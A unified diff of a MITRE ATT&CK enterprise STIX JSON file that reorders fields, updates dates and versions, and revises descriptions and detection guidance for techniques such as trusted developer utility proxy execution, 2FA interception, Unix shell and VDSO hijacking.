+ "x_mitre_detection": "Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.",
+ "x_mitre_defense_bypassed": [
+ "Defensive network service scanning"
+ ],
+ "x_mitre_version": "2.0",
+ "x_mitre_is_subtechnique": false
},
{
"external_references": [
@@ -27459,26 +28370,26 @@
],
"modified": "2020-03-29T23:43:44.256Z",
"created": "2019-08-30T13:03:04.038Z",
- "x_mitre_platforms": [
- "Azure",
- "AWS",
- "GCP"
- ],
- "x_mitre_contributors": [
- "Praetorian"
- ],
- "x_mitre_network_requirements": true,
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_detection": "Monitor account activity for attempts to share data, snapshots, or backups with untrusted or unusual accounts on the same cloud service provider. Monitor for anomalous file transfer activity between accounts and to untrusted VPCs. ",
"x_mitre_data_sources": [
"Stackdriver logs",
"Azure activity logs",
"AWS CloudTrail logs"
],
- "x_mitre_detection": "Monitor account activity for attempts to share data, snapshots, or backups with untrusted or unusual accounts on the same cloud service provider. Monitor for anomalous file transfer activity between accounts and to untrusted VPCs. ",
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.0",
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_network_requirements": true,
+ "x_mitre_contributors": [
+ "Praetorian"
+ ],
+ "x_mitre_platforms": [
+ "Azure",
+ "AWS",
+ "GCP"
+ ]
},
{
"id": "attack-pattern--cc1e737c-236c-4e3b-83ba-32039a626ef8",
@@ -27539,27 +28450,27 @@
],
"modified": "2020-03-02T15:20:28.455Z",
"created": "2020-03-02T14:27:00.693Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_data_sources": [
- "Packet capture",
- "Network protocol analysis"
- ],
- "x_mitre_detection": "Detecting the manipulation of data as at passes over a network can be difficult without the appropriate tools. In some cases integrity verification checks, such as file hashing, may be used on critical files as they transit a network. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data. ",
- "x_mitre_impact_type": [
- "Integrity"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"User",
"Administrator",
"SYSTEM",
"root"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_impact_type": [
+ "Integrity"
+ ],
+ "x_mitre_detection": "Detecting the manipulation of data as at passes over a network can be difficult without the appropriate tools. In some cases integrity verification checks, such as file hashing, may be used on critical files as they transit a network. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data. ",
+ "x_mitre_data_sources": [
+ "Packet capture",
+ "Network protocol analysis"
+ ],
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -27595,26 +28506,26 @@
],
"modified": "2020-03-25T22:59:59.124Z",
"created": "2019-12-12T15:08:20.972Z",
- "x_mitre_platforms": [
- "Linux",
- "Windows"
- ],
- "x_mitre_contributors": [
- "ESET",
- " Christoffer Str\u00f6mblad"
+ "x_mitre_detection": "Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components.",
+ "x_mitre_data_sources": [
+ "Application logs",
+ "File monitoring"
],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
"x_mitre_permissions_required": [
"SYSTEM",
"Administrator",
"root"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_data_sources": [
- "Application logs",
- "File monitoring"
+ "x_mitre_contributors": [
+ "ESET",
+ " Christoffer Str\u00f6mblad"
],
- "x_mitre_detection": "Consider monitoring application logs for abnormal behavior that may indicate suspicious installation of application software components. Consider monitoring file locations associated with the installation of new application software components such as paths from which applications typically load such extensible components."
+ "x_mitre_platforms": [
+ "Linux",
+ "Windows"
+ ]
},
{
"id": "attack-pattern--b53dbcc6-147d-48bb-9df4-bcb8bb808ff6",
@@ -27679,22 +28590,22 @@
],
"modified": "2020-03-24T16:43:02.273Z",
"created": "2020-01-24T14:17:43.906Z",
- "x_mitre_platforms": [
- "macOS",
- "Linux"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
],
+ "x_mitre_detection": "Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts.",
"x_mitre_data_sources": [
"Process command-line parameters",
"Process monitoring",
"File monitoring"
],
- "x_mitre_detection": "Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts.",
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "macOS",
+ "Linux"
+ ]
},
{
"object_marking_refs": [
@@ -27727,7 +28638,7 @@
"description": "LOLBAS. (n.d.). Tracker.exe. Retrieved July 31, 2019."
}
],
- "description": "Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application whitelisting defensive solutions.",
+ "description": "Adversaries may take advantage of trusted developer utilities to proxy execution of malicious payloads. There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering.(Citation: engima0x3 DNX Bypass)(Citation: engima0x3 RCSI Bypass)(Citation: Exploit Monday WinDbg)(Citation: LOLBAS Tracker) These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application control solutions.",
"name": "Trusted Developer Utilities Proxy Execution",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"id": "attack-pattern--ff25900d-76d5-449b-a351-8824e62fc81b",
@@ -27738,33 +28649,34 @@
"kill_chain_name": "mitre-attack"
}
],
- "modified": "2020-03-29T19:56:43.361Z",
+ "modified": "2020-06-20T22:43:41.298Z",
"created": "2017-05-31T21:31:39.262Z",
- "x_mitre_is_subtechnique": false,
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_detection": "Monitor for abnormal presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.\n\nUse process monitoring to monitor the execution and arguments of from developer utilities that may be abused. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. It is likely that these utilities will be used by software developers or for other software development related tasks, so if it exists and is used outside of that context, then the event may be suspicious. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.",
- "x_mitre_defense_bypassed": [
- "Application whitelisting"
+ "x_mitre_version": "1.2",
+ "x_mitre_contributors": [
+ "Casey Smith",
+ "Matthew Demaske, Adaptforward"
],
"x_mitre_data_sources": [
"File monitoring",
"Process monitoring"
],
- "x_mitre_contributors": [
- "Casey Smith",
- "Matthew Demaske, Adaptforward"
+ "x_mitre_defense_bypassed": [
+ "Application control"
],
- "x_mitre_version": "1.2"
+ "x_mitre_detection": "Monitor for abnormal presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.\n\nUse process monitoring to monitor the execution and arguments of from developer utilities that may be abused. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. It is likely that these utilities will be used by software developers or for other software development related tasks, so if it exists and is used outside of that context, then the event may be suspicious. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed.",
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_is_subtechnique": false
},
{
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
+ "id": "attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Trusted Relationship",
+ "description": "Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.\n\nOrganizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.",
"external_references": [
{
"source_name": "mitre-attack",
@@ -27772,10 +28684,9 @@
"external_id": "T1199"
}
],
- "description": "Adversaries may breach or otherwise leverage organizations who have access to intended victims. Access through trusted third party relationship exploits an existing connection that may not be protected or receives less scrutiny than standard mechanisms of gaining access to a network.\n\nOrganizations often grant elevated access to second or third-party external providers in order to allow them to manage internal systems as well as cloud-based environments. Some examples of these relationships include IT services contractors, managed security providers, infrastructure contractors (e.g. HVAC, elevators, physical security). The third-party provider's access may be intended to be limited to the infrastructure being maintained, but may exist on the same network as the rest of the enterprise. As such, [Valid Accounts](https://attack.mitre.org/techniques/T1078) used by the other party for access to internal network systems may be compromised and used.",
- "name": "Trusted Relationship",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "id": "attack-pattern--9fa07bef-9c81-421e-a8e5-ad4366c5a925",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -27783,8 +28694,9 @@
"phase_name": "initial-access"
}
],
- "modified": "2019-10-11T15:20:53.687Z",
+ "modified": "2020-07-14T19:38:14.299Z",
"created": "2018-04-18T17:59:24.739Z",
+ "x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"Linux",
"Windows",
@@ -27809,10 +28721,18 @@
]
},
{
- "id": "attack-pattern--dd43c543-bb85-4a6f-aa6e-160d90d06a49",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Two-Factor Authentication Interception",
- "description": "Adversaries may target two-factor authentication mechanisms, such as smart cards, to gain access to credentials that can be used to access systems, services, and network resources. Use of two or multi-factor authentication (2FA or MFA) is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. \n\nIf a smart card is used for two-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011)\n\nAdversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011)\n\nOther methods of 2FA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental)",
+ "created": "2017-05-31T21:31:23.195Z",
+ "modified": "2020-03-25T20:35:21.672Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "credential-access"
+ }
+ ],
+ "type": "attack-pattern",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -27835,18 +28755,10 @@
"source_name": "Operation Emmental"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "credential-access"
- }
- ],
- "modified": "2020-03-25T20:35:21.672Z",
- "created": "2017-05-31T21:31:23.195Z",
+ "description": "Adversaries may target two-factor authentication mechanisms, such as smart cards, to gain access to credentials that can be used to access systems, services, and network resources. Use of two or multi-factor authentication (2FA or MFA) is recommended and provides a higher level of security than user names and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. \n\nIf a smart card is used for two-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. (Citation: Mandiant M Trends 2011)\n\nAdversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user's personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). (Citation: GCN RSA June 2011)\n\nOther methods of 2FA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Although primarily focused on by cyber criminals, these authentication mechanisms have been targeted by advanced actors. (Citation: Operation Emmental)",
+ "name": "Two-Factor Authentication Interception",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "attack-pattern--dd43c543-bb85-4a6f-aa6e-160d90d06a49",
"x_mitre_version": "1.1",
"x_mitre_contributors": [
"John Lambert, Microsoft Threat Intelligence Center"
@@ -27892,6 +28804,64 @@
"created": "2017-05-31T21:30:53.408Z"
},
{
+ "id": "attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56",
+ "description": "Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.\n\nUnix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.\n\nAdversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.",
+ "name": "Unix Shell",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "external_id": "T1059.004",
+ "url": "https://attack.mitre.org/techniques/T1059/004"
+ },
+ {
+ "source_name": "DieNet Bash",
+ "url": "https://linux.die.net/man/1/bash",
+ "description": "die.net. (n.d.). bash(1) - Linux man page. Retrieved June 12, 2020."
+ },
+ {
+ "source_name": "Apple ZShell",
+ "url": "https://support.apple.com/HT208050",
+ "description": "Apple. (2020, January 28). Use zsh as the default shell on your Mac. Retrieved June 12, 2020."
+ }
+ ],
+ "type": "attack-pattern",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "execution"
+ }
+ ],
+ "modified": "2020-06-15T16:55:44.483Z",
+ "created": "2020-03-09T14:15:05.330Z",
+ "x_mitre_platforms": [
+ "macOS",
+ "Linux"
+ ],
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Process monitoring",
+ "Process command-line parameters"
+ ],
+ "x_mitre_detection": "Unix shell usage may be common on administrator, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then any attempt to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information discovery, collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. ",
+ "x_mitre_permissions_required": [
+ "User",
+ "root"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
+ },
+ {
+ "id": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517",
+ "description": "Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).",
+ "name": "Unsecured Credentials",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -27899,13 +28869,6 @@
"url": "https://attack.mitre.org/techniques/T1552"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Unsecured Credentials",
- "description": "Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://attack.mitre.org/techniques/T1552/003)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://attack.mitre.org/techniques/T1552/002)), or other specialized files/artifacts (e.g. [Private Keys](https://attack.mitre.org/techniques/T1552/004)).",
- "id": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -27913,7 +28876,7 @@
"phase_name": "credential-access"
}
],
- "modified": "2020-03-31T12:53:56.541Z",
+ "modified": "2020-06-17T14:25:38.461Z",
"created": "2020-02-04T12:47:23.631Z",
"x_mitre_platforms": [
"Linux",
@@ -27973,26 +28936,27 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2019-10-22T19:56:22.024Z",
+ "modified": "2020-07-14T19:17:44.563Z",
"created": "2019-09-04T14:35:04.617Z",
- "x_mitre_detection": "Monitor system logs to review activities occurring across all cloud environments and regions. Configure alerting to notify of activity in normally unused regions or if the number of instances active in a region goes above a certain threshold.(Citation: CloudSploit - Unused AWS Regions)",
- "x_mitre_permissions_required": [
- "User"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "AWS",
+ "GCP",
+ "Azure"
],
+ "x_mitre_contributors": [
+ "Netskope"
+ ],
+ "x_mitre_version": "1.0",
"x_mitre_data_sources": [
"Stackdriver logs",
"Azure activity logs",
"AWS CloudTrail logs"
],
- "x_mitre_version": "1.0",
- "x_mitre_contributors": [
- "Netskope"
+ "x_mitre_permissions_required": [
+ "User"
],
- "x_mitre_platforms": [
- "AWS",
- "GCP",
- "Azure"
- ]
+ "x_mitre_detection": "Monitor system logs to review activities occurring across all cloud environments and regions. Configure alerting to notify of activity in normally unused regions or if the number of instances active in a region goes above a certain threshold.(Citation: CloudSploit - Unused AWS Regions)"
},
{
"external_references": [
@@ -28037,22 +29001,22 @@
],
"modified": "2020-03-24T12:36:24.608Z",
"created": "2020-01-30T16:18:36.873Z",
- "x_mitre_platforms": [
- "Windows",
- "Office 365",
- "SaaS"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_defense_bypassed": [
+ "System Access Controls"
],
+ "x_mitre_detection": "Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).",
"x_mitre_data_sources": [
"Office 365 audit logs",
"OAuth audit logs",
"Authentication logs"
],
- "x_mitre_detection": "Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).",
- "x_mitre_defense_bypassed": [
- "System Access Controls"
- ],
- "x_mitre_is_subtechnique": false,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows",
+ "Office 365",
+ "SaaS"
+ ]
},
{
"external_references": [
@@ -28089,37 +29053,49 @@
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
+ },
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "discovery"
}
],
- "modified": "2020-03-27T14:10:32.872Z",
+ "modified": "2020-07-01T16:32:02.491Z",
"created": "2020-03-06T21:04:12.454Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_contributors": [
- "Deloitte Threat Library Team"
- ],
- "x_mitre_data_sources": [
- "Process command-line parameters",
- "Process use of network"
- ],
- "x_mitre_detection": "User activity-based checks will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. ",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
"x_mitre_defense_bypassed": [
"Anti-virus",
"Static File Analysis",
"Signature-based detection",
"Host forensic analysis"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "User activity-based checks will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to virtualization and sandbox identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection. ",
+ "x_mitre_data_sources": [
+ "Process command-line parameters",
+ "Process use of network"
+ ],
+ "x_mitre_contributors": [
+ "Deloitte Threat Library Team"
+ ],
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
]
},
{
- "id": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "User Execution",
- "description": "An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).\n\nWhile [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).",
+ "created": "2018-04-18T17:59:24.739Z",
+ "modified": "2020-03-11T14:55:56.315Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "execution"
+ }
+ ],
+ "type": "attack-pattern",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -28127,18 +29103,10 @@
"url": "https://attack.mitre.org/techniques/T1204"
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "execution"
- }
- ],
- "modified": "2020-03-11T14:55:56.315Z",
- "created": "2018-04-18T17:59:24.739Z",
+ "description": "An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).\n\nWhile [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).",
+ "name": "User Execution",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "id": "attack-pattern--8c32eb4d-805f-4fc5-bf60-c4d476c131b5",
"x_mitre_version": "1.2",
"x_mitre_data_sources": [
"Anti-virus",
@@ -28159,55 +29127,9 @@
],
"x_mitre_is_subtechnique": false
},
- {
- "external_references": [
- {
- "source_name": "mitre-attack",
- "external_id": "T1059.005",
- "url": "https://attack.mitre.org/techniques/T1059/005"
- },
- {
- "source_name": "Microsoft VBScript",
- "url": "https://docs.microsoft.com/previous-versions//1kw29xwf(v=vs.85)",
- "description": "Microsoft. (2011, April 19). What Is VBScript?. Retrieved March 28, 2020."
- }
- ],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "VBScript",
- "description": "Adversaries may abuse VBScript scripts for execution. VBScript is a Windows scripting language modeled after the Visual Basic language, also known as Visual Basic for Applications (VBA).(Citation: Microsoft VBScript) VBScript is built on top of the [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM), which allows it to interact with the environment. VBScript can also be used in place of JavaScript on webpages served to Internet Explorer, however, most modern browsers do not come with VBScript support.\n\nIn a command-line environment, Cscript.exe is used to execute scripts. If a GUI is desired, Wscript.exe is used.\n\nAdversaries may abuse VBScript to execute malicious command and payloads. A common usage is embedding VBScript content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads.",
- "id": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "execution"
- }
- ],
- "modified": "2020-03-28T17:34:02.708Z",
- "created": "2020-03-09T14:29:51.508Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_data_sources": [
- "Windows event logs",
- "Process monitoring",
- "Process command-line parameters"
- ],
- "x_mitre_detection": "Monitor for usage of Cscript.exe or Wscript.exe. Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.\n\nScripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script.",
- "x_mitre_permissions_required": [
- "User",
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
- },
{
"id": "attack-pattern--98be40f2-c86b-4ade-b6fc-4964932040e5",
- "description": "Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (VDSO) hijacking is a method of executing arbitrary code in the address space of a separate live process. \n\nVDSO hijacking involves redirecting calls to dynamically linked shared libraries mapped into all user-land processes by the kernel. An adversary may patch memory address references stored in a process' global offset table (which store absolute addresses of functions) to inject malicious code into a running process. This code can then be invoked by redirecting the execution flow of the process (ex: using custom shellcode or hijacked system calls). (Citation: ELF Injection May 2009) \n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process. ",
+ "description": "Adversaries may inject malicious code into processes via VDSO hijacking in order to evade process-based defenses as well as possibly elevate privileges. Virtual dynamic shared object (vdso) hijacking is a method of executing arbitrary code in the address space of a separate live process. \n\nVDSO hijacking involves redirecting calls to dynamically linked shared libraries. Memory protections may prevent writing executable code to a process via [Ptrace System Calls](https://attack.mitre.org/techniques/T1055/008). However, an adversary may hijack the syscall interface code stubs mapped into a process from the vdso shared object to execute syscalls to open and map a malicious shared object. This code can then be invoked by redirecting the execution flow of the process via patched memory address references stored in a process' global offset table (which store absolute addresses of mapped library functions).(Citation: ELF Injection May 2009) (Citation: Backtrace VDSO) (Citation: VDSO Aug 2005) (Citation: Syscall 2014)\n\nRunning code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process. ",
"name": "VDSO Hijacking",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -28224,6 +29146,21 @@
